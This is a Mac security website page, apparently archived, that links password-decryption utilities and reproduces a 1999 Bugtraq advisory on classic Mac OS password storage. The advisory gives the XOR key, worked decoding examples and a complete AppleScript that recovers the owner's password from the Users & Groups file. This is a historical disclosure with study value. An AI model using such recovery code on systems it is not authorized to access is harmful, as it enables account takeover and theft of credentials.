SecureMac.com
About SecureMac Advertise Security Consulting Mac Security Store Send Feedback

Site Information
Site Background
Who runs the site
Advertising
Security Consulting
Employment/Jobs
Feedback Form

SecureMac Software
PrivacyScan

 

Mac OS X Security
sudo buffer overflow exploit + fix
Disable Single User Boot Mode
Malevolence - Dumping Passwords
nidump security
Startup Security - Open Firmware Password Protection

Mac OS X Network Security
SAINT
Secure FTP Wrapper
Ettercap - sniffer interceptor logger
Snort - Network Intrusion Detection System
SSH Admin
SSH Helper
xnu - enable MAC Address spoofing


Mac OS X Virus

Mac OS X Firewalls
Firewalk Firewall Utility
NetBarrier X

Mac OS X App Sec.

Mac OS X Encryption
LittleSecrets
GPGMail - PGP Functionality

Mac OS X DoS

SecureMac Library
Mac Cable Modem Security
Mac Security Auditing
Mac OS X Security Understanding
Mac OS X Security Second Lessons
Mac OS X Security Third Lesson
Mac OS X Single User Mode Root Access
Mac OS X Shareware Firewalls
Mac OS X Secure Installation
Cable & DSL Connections - Security Measures
Better Safe than Sorry
Apple.com Security Resources
Marketing Macintosh Security Programs

Decrypt-a-tron is a application to decrypt the Apple password algorithm, created by System Coyboy. SCREENSHOT is here


macfspwd.c is a .c script to decrypt the apple password algorithm. Created by Nate Pierce. This is a .c document. You can use a compiler or a unix machine to execute it.


Nate Pierce has writtin a second edition to his macfspwd.c, the apple encryption algorithm. the 2nd revision adds the possibility of running like grep: macfspwd2 [accountname] [users & groups db filename] It currently pulls out all occurrances of the account name in the file, but I'll look into how to limit it to just the entry with the encrypted password. Later I'll try to figure out how to read the userlist from the file and extract all passwords. Again, use at your own risk...

Apple.com has setup a conference, or discussion list with Q&A about the Apple Encryption algorithm read it to keep up with the ideas and ways around it. More detailed.


	

Date: Sat, 10 Jul 1999 15:28:17 +0200 

From: Dawid adix Adamski  

To: BUGTRAQ@SECURITYFOCUS.COM 

Subject: MacOS system encryption algorithm 



The encryption algorithm in MacOS system is simple and the password can be 

easily decoded. 



Password is stored in Users & Groups Data File in Preferences folder. 

Offset 

is different on each system and depends on Users & Groups configuration, 

but 

it always lie after owner's username. It's not so difficult to find it 

using 

hex editor, even if we don't know owner's username. 



Here are some examples of encrypted passwords: 

00 04 06 18 0D 0A 19 0B = stayaway 

0A 1F 10 1B 00 07 75 1E = yellow 

1C 1B 16 14 12 62 10 7B = owner 

07 02 13 1A 1E 0F 1A 14 = turnpage 

27 25 33 27 27 39 24 7E = Trustno1 



AA BB CC DD EE FF GG HH = aa bb cc dd ee ff gg hh 



where: 

AA BB CC DD EE FF GG HH - encrypted password (hex) 

aa bb cc dd ee ff gg hh - decrypted password in ASCII codes (hex) 



aa=AA XOR 73H 

bb=BB XOR AA XOR 70H 

cc=CC XOR BB XOR 63H 

dd=DD XOR CC XOR 67H 

ee=EE XOR DD XOR 74H 

ff=FF XOR EE XOR 70H 

gg=GG XOR FF XOR 72H 

hh=HH XOR GG XOR 6BH 



An example: 

Let's take OO 04 06 18 0D 0A 19 0B 



00H XOR 73H = 73H = s 

04H XOR 00H = 04H; 04H XOR 70H = 74H = t 

06H XOR 04H = 02H; O2H XOR 63H = 61H = a 

18H XOR 06H = 1EH; 1EH XOR 67H = 79H = y 

0DH XOR 18H = 15H; 15H XOR 74H = 61H = a 

0AH XOR 0DH = 07H; 07H XOR 70H = 77H = w 

19H XOR 0AH = 13H; 13H XOR 72H = 61H = a 

0BH XOR 19H = 12H; 12H XOR 6BH = 79H = y 



tested on: 

MacOS 7.5.3, 7.5.5, 8.1, 8.5 



I wrote an apple script to break passwords 



--------CUT HERE-------- 

(*          MacOS Pass 2.1 by adix      15.06.99; Apple Script English     

*) 

global lbin, bit1, bit2, bitk 

set hex1 to text returned of (display dialog "Enter encrypted password 

(hex): " default answer "" buttons {" Ok "} default button " Ok " with 

icon 

stop) 

set Alicia to 

"0111001101110000011000110110011101110100011100000111001001101011" 

set pass to "" 

set lbin to "" 

set razem to "" 

set i to 1 

set skok to 0 

set ile to count items in hex1 

if ile = 0 or ile = 1 then 

set pass to "" 

else 

repeat until (i > (ile - 1)) 

  set kodascii to 0 

  set razem to "" 

  set zn to items (i) thru (i + 1) in hex1 

  set lbin to hex2bin(zn) 

  repeat with a from 1 to 8 

   set bit1 to item (a + skok) of Alicia 

   xor(a) 

   set razem to {razem & bitk} as string 

   if i < 2 then 

    set kodascii to {kodascii + bitk * (2 ^ (8 - a))} 

   end if 

  end repeat 

  if i < 2 then 

   set pass to {pass & (ASCII character kodascii)} 

  else 

   set zn to items (i - 2) thru (i - 1) in hex1 

   set lbin to hex2bin(zn) 

   repeat with a from 1 to 8 

    set bit1 to item a of razem 

    xor(a) 

    set kodascii to {kodascii + bitk * (2 ^ (8 - a))} 

   end repeat 

   set pass to {pass & (ASCII character kodascii)} 

  end if 

  set skok to skok + 8 

  set i to i + 2 

end repeat 

end if 

display dialog "Password:   " & pass & return & return & "by adix" buttons 

{" Ok "} default button " Ok " with icon note 

on hex2bin(zn) 

set temphex to {"0000", "0001", "0010", "0011", "0100", "0101", "0110", 

"0111", "1000", "1001", "1010", "1011", "1100", - 

  "1101", "1110", "1111"} 

set t2hex to "0123456789ABCDEF" 

set bin to "" 

repeat with j in zn 

  set t1 to j as string 

  repeat with i from 1 to (count items in t2hex) 

   if ((item i in t2hex) = t1) then 

    set temp to (item i in temphex) 

    exit repeat 

   end if 

  end repeat 

  set bin to {bin & temp} as string 

end repeat 

return (bin) 

end hex2bin 

on xor(a) 

set bit2 to item a in lbin 

if bit1 = bit2 then 

  set bitk to "0" 

else 

  set bitk to "1" 

end if 

end xor 

--------CUT HERE-------- 



Dawid adix Adamski 

adixx@friko4.onet.pl 







Enter Email Address:

Enter your message:


Select Either of These Two Buttons


Security + OS
DiskLock
PowerBook Security Control Panel
Empower Pro
FileGuard
FreeGuard
FoolProof
Deus Lock Master
OnGuard
Keys Off
LockOut
MacOS Algorithm
Modem Security
Password Key
PGPuam
PPF
Shift Key Suite
Stealth Signal
SuperLock Lite
SuperLock Pro
Web-Confidential


Macintosh Viruses
Disinfectant
Sophos Anti-Virus
Norton AntiVirus
Nav 7 Nav 6 Nav X
Virex - Oct
VirusBarrier - Netupdate
vScan - Discontinued.

Mac Physical Security


Macintosh Firewalls
DoorStop Firewall
Firewall Q & A
IPNetSentry
NetBarrier
Norton Personal Firewall

Mac Spyware & Privacy
Monitorer
NetShred - Delete Files Safely

Network Security
MacAnalysis
Oyabun Tools
WDTech RAE
ToolDaemon

Application Security Issues
AIM - AOL Instant Messenger
Back Orifice
Eudora E-Mail Client
Internet Configure
IE 5.1, OE 5.1, Powerpoint, Excel Vulnerability
MS Personal webServer
NetBus
Outlook Express 4.5 Password Flaw
SubSeven
Sub7ME Server

Resource Info
AppleShare Server Info

Mac OS Encryption
EnScript
FGP
FileTwister
ForgotIt?
GenPass
MacLockSmith
My-Privacy
My Secret
PGPi
PGPhone
PGP Personal
PGP Freeware
PowerCrypt-dev
Private File
Quick Encrypt
SubRosa Utilities
Tresor

Deleting Files
Eraser Pro
ShredIt

Backups

Apple Hardware

MacOS DoS
Mac Attack


All material (c) 2014 SecureMac.com and respected owners